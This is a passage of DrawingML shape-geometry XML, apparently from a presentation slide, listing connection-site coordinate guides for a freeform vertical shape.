              <a:gd name="connsiteX119" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY143" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX144" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY14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45501 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 379513 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 5765594 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 5693685 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY71" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY72" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 622035 w 1508539"/>
              <a:gd name="connsiteY73" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 620650 w 1508539"/>
              <a:gd name="connsiteY74" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 619534 w 1508539"/>
              <a:gd name="connsiteY75" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 621267 w 1508539"/>
              <a:gd name="connsiteY76" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 625010 w 1508539"/>
              <a:gd name="connsiteY77" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 624476 w 1508539"/>
              <a:gd name="connsiteY78" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 633172 w 1508539"/>
              <a:gd name="connsiteY79" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 640518 w 1508539"/>
              <a:gd name="connsiteY80" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 639814 w 1508539"/>
              <a:gd name="connsiteY81" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 643257 w 1508539"/>
              <a:gd name="connsiteY82" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 650795 w 1508539"/>
              <a:gd name="connsiteY83" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 652466 w 1508539"/>
              <a:gd name="connsiteY84" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 670029 w 1508539"/>
              <a:gd name="connsiteY85" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 670454 w 1508539"/>
              <a:gd name="connsiteY86" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 672277 w 1508539"/>
              <a:gd name="connsiteY87" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 659112 w 1508539"/>
              <a:gd name="connsiteY88" fmla="*/ 3183755 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 659613 w 1508539"/>
              <a:gd name="connsiteY89" fmla="*/ 3178642 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 647213 w 1508539"/>
              <a:gd name="connsiteY90" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 632398 w 1508539"/>
              <a:gd name="connsiteY91" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 633063 w 1508539"/>
              <a:gd name="connsiteY92" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 623931 w 1508539"/>
              <a:gd name="connsiteY93" fmla="*/ 3114519 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 610540 w 1508539"/>
              <a:gd name="connsiteY94" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 583270 w 1508539"/>
              <a:gd name="connsiteY95" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 525884 w 1508539"/>
              <a:gd name="connsiteY96" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 474802 w 1508539"/>
              <a:gd name="connsiteY97" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 454896 w 1508539"/>
              <a:gd name="connsiteY98" fmla="*/ 2485734 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 445619 w 1508539"/>
              <a:gd name="connsiteY99" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 432580 w 1508539"/>
              <a:gd name="connsiteY100" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 438579 w 1508539"/>
              <a:gd name="connsiteY101" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 441191 w 1508539"/>
              <a:gd name="connsiteY102" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 417520 w 1508539"/>
              <a:gd name="connsiteY103" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 407407 w 1508539"/>
              <a:gd name="connsiteY104" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 391624 w 1508539"/>
              <a:gd name="connsiteY105" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 389082 w 1508539"/>
              <a:gd name="connsiteY106" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 390075 w 1508539"/>
              <a:gd name="connsiteY107" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 381881 w 1508539"/>
              <a:gd name="connsiteY108" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 363059 w 1508539"/>
              <a:gd name="connsiteY109" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 339616 w 1508539"/>
              <a:gd name="connsiteY110" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 293415 w 1508539"/>
              <a:gd name="connsiteY111" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 265726 w 1508539"/>
              <a:gd name="connsiteY112" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 264852 w 1508539"/>
              <a:gd name="connsiteY113" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 245647 w 1508539"/>
              <a:gd name="connsiteY114" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 258727 w 1508539"/>
              <a:gd name="connsiteY115" fmla="*/ 1519474 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 251469 w 1508539"/>
              <a:gd name="connsiteY116" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 237554 w 1508539"/>
              <a:gd name="connsiteY117" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 245861 w 1508539"/>
              <a:gd name="connsiteY118" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 247049 w 1508539"/>
              <a:gd name="connsiteY119" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 251734 w 1508539"/>
              <a:gd name="connsiteY120" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 244016 w 1508539"/>
              <a:gd name="connsiteY121" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 233322 w 1508539"/>
              <a:gd name="connsiteY122" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 222058 w 1508539"/>
              <a:gd name="connsiteY123" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 223514 w 1508539"/>
              <a:gd name="connsiteY124" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 225750 w 1508539"/>
              <a:gd name="connsiteY125" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 218379 w 1508539"/>
              <a:gd name="connsiteY126" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 187787 w 1508539"/>
              <a:gd name="connsiteY127" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 166737 w 1508539"/>
              <a:gd name="connsiteY128" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 166295 w 1508539"/>
              <a:gd name="connsiteY129" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 151966 w 1508539"/>
              <a:gd name="connsiteY130" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 137385 w 1508539"/>
              <a:gd name="connsiteY131" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 142396 w 1508539"/>
              <a:gd name="connsiteY132" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX133" fmla="*/ 128338 w 1508539"/>
              <a:gd name="connsiteY133" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX134" fmla="*/ 128019 w 1508539"/>
              <a:gd name="connsiteY134" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX135" fmla="*/ 107645 w 1508539"/>
              <a:gd name="connsiteY135" fmla="*/ 530055 h 6858000"/>
              <a:gd name="connsiteX136" fmla="*/ 106893 w 1508539"/>
              <a:gd name="connsiteY136" fmla="*/ 465389 h 6858000"/>
              <a:gd name="connsiteX137" fmla="*/ 89816 w 1508539"/>
              <a:gd name="connsiteY137" fmla="*/ 424699 h 6858000"/>
              <a:gd name="connsiteX138" fmla="*/ 90191 w 1508539"/>
              <a:gd name="connsiteY138" fmla="*/ 404917 h 6858000"/>
              <a:gd name="connsiteX139" fmla="*/ 70148 w 1508539"/>
              <a:gd name="connsiteY139" fmla="*/ 367211 h 6858000"/>
              <a:gd name="connsiteX140" fmla="*/ 36452 w 1508539"/>
              <a:gd name="connsiteY140" fmla="*/ 268519 h 6858000"/>
              <a:gd name="connsiteX141" fmla="*/ 23935 w 1508539"/>
              <a:gd name="connsiteY141" fmla="*/ 160886 h 6858000"/>
              <a:gd name="connsiteX142" fmla="*/ 19312 w 1508539"/>
              <a:gd name="connsiteY142" fmla="*/ 47336 h 6858000"/>
              <a:gd name="connsiteX143" fmla="*/ 0 w 1508539"/>
              <a:gd name="connsiteY14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45501 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 411349 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 569368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11349 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 569368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11349 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 569368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08411 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 570490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90557 w 1508539"/>
              <a:gd name="connsiteY23" fmla="*/ 6153037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08411 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 570490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64248 w 1508539"/>
              <a:gd name="connsiteY7" fmla="*/ 6574442 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 164588 w 1508539"/>
              <a:gd name="connsiteY8" fmla="*/ 6568530 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 166997 w 1508539"/>
              <a:gd name="connsiteY9" fmla="*/ 6560674 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 167342 w 1508539"/>
              <a:gd name="connsiteY10" fmla="*/ 6560598 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 201349 w 1508539"/>
              <a:gd name="connsiteY11" fmla="*/ 6530567 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 215389 w 1508539"/>
              <a:gd name="connsiteY12" fmla="*/ 6478062 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 226078 w 1508539"/>
              <a:gd name="connsiteY13" fmla="*/ 6460325 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 233311 w 1508539"/>
              <a:gd name="connsiteY14" fmla="*/ 6451488 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 234746 w 1508539"/>
              <a:gd name="connsiteY15" fmla="*/ 6451348 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 239104 w 1508539"/>
              <a:gd name="connsiteY16" fmla="*/ 6414240 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 241880 w 1508539"/>
              <a:gd name="connsiteY17" fmla="*/ 6384857 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 240591 w 1508539"/>
              <a:gd name="connsiteY18" fmla="*/ 6367510 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 244471 w 1508539"/>
              <a:gd name="connsiteY19" fmla="*/ 6349778 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 246136 w 1508539"/>
              <a:gd name="connsiteY20" fmla="*/ 6348250 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 262170 w 1508539"/>
              <a:gd name="connsiteY21" fmla="*/ 6281972 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 290557 w 1508539"/>
              <a:gd name="connsiteY22" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 314428 w 1508539"/>
              <a:gd name="connsiteY23" fmla="*/ 6113913 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 318721 w 1508539"/>
              <a:gd name="connsiteY24" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 363126 w 1508539"/>
              <a:gd name="connsiteY25" fmla="*/ 5934687 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 408411 w 1508539"/>
              <a:gd name="connsiteY26" fmla="*/ 5704905 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 431404 w 1508539"/>
              <a:gd name="connsiteY27" fmla="*/ 5665173 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 465121 w 1508539"/>
              <a:gd name="connsiteY28" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 494626 w 1508539"/>
              <a:gd name="connsiteY29" fmla="*/ 5476393 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 525819 w 1508539"/>
              <a:gd name="connsiteY30" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 541800 w 1508539"/>
              <a:gd name="connsiteY31" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 575293 w 1508539"/>
              <a:gd name="connsiteY32" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 584892 w 1508539"/>
              <a:gd name="connsiteY33" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 596118 w 1508539"/>
              <a:gd name="connsiteY34" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 597138 w 1508539"/>
              <a:gd name="connsiteY35" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 604479 w 1508539"/>
              <a:gd name="connsiteY36" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 607782 w 1508539"/>
              <a:gd name="connsiteY37" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 608766 w 1508539"/>
              <a:gd name="connsiteY38" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 604400 w 1508539"/>
              <a:gd name="connsiteY39" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 611077 w 1508539"/>
              <a:gd name="connsiteY40" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 608010 w 1508539"/>
              <a:gd name="connsiteY41" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 614840 w 1508539"/>
              <a:gd name="connsiteY42" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 621876 w 1508539"/>
              <a:gd name="connsiteY43" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 624607 w 1508539"/>
              <a:gd name="connsiteY44" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 621311 w 1508539"/>
              <a:gd name="connsiteY45" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 622865 w 1508539"/>
              <a:gd name="connsiteY46" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 629774 w 1508539"/>
              <a:gd name="connsiteY47" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 625630 w 1508539"/>
              <a:gd name="connsiteY48" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 641033 w 1508539"/>
              <a:gd name="connsiteY49" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 646936 w 1508539"/>
              <a:gd name="connsiteY50" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 651669 w 1508539"/>
              <a:gd name="connsiteY51" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 652962 w 1508539"/>
              <a:gd name="connsiteY52" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 650769 w 1508539"/>
              <a:gd name="connsiteY53" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 646249 w 1508539"/>
              <a:gd name="connsiteY54" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 641332 w 1508539"/>
              <a:gd name="connsiteY55" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 637897 w 1508539"/>
              <a:gd name="connsiteY56" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 618550 w 1508539"/>
              <a:gd name="connsiteY57" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 622623 w 1508539"/>
              <a:gd name="connsiteY58" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 607879 w 1508539"/>
              <a:gd name="connsiteY59" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 609028 w 1508539"/>
              <a:gd name="connsiteY60" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 607604 w 1508539"/>
              <a:gd name="connsiteY61" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 593899 w 1508539"/>
              <a:gd name="connsiteY62" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 595497 w 1508539"/>
              <a:gd name="connsiteY63" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 588919 w 1508539"/>
              <a:gd name="connsiteY64" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 590250 w 1508539"/>
              <a:gd name="connsiteY65" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 594604 w 1508539"/>
              <a:gd name="connsiteY66" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 599682 w 1508539"/>
              <a:gd name="connsiteY67" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 622276 w 1508539"/>
              <a:gd name="connsiteY68" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 621701 w 1508539"/>
              <a:gd name="connsiteY69" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 622008 w 1508539"/>
              <a:gd name="connsiteY70" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 622035 w 1508539"/>
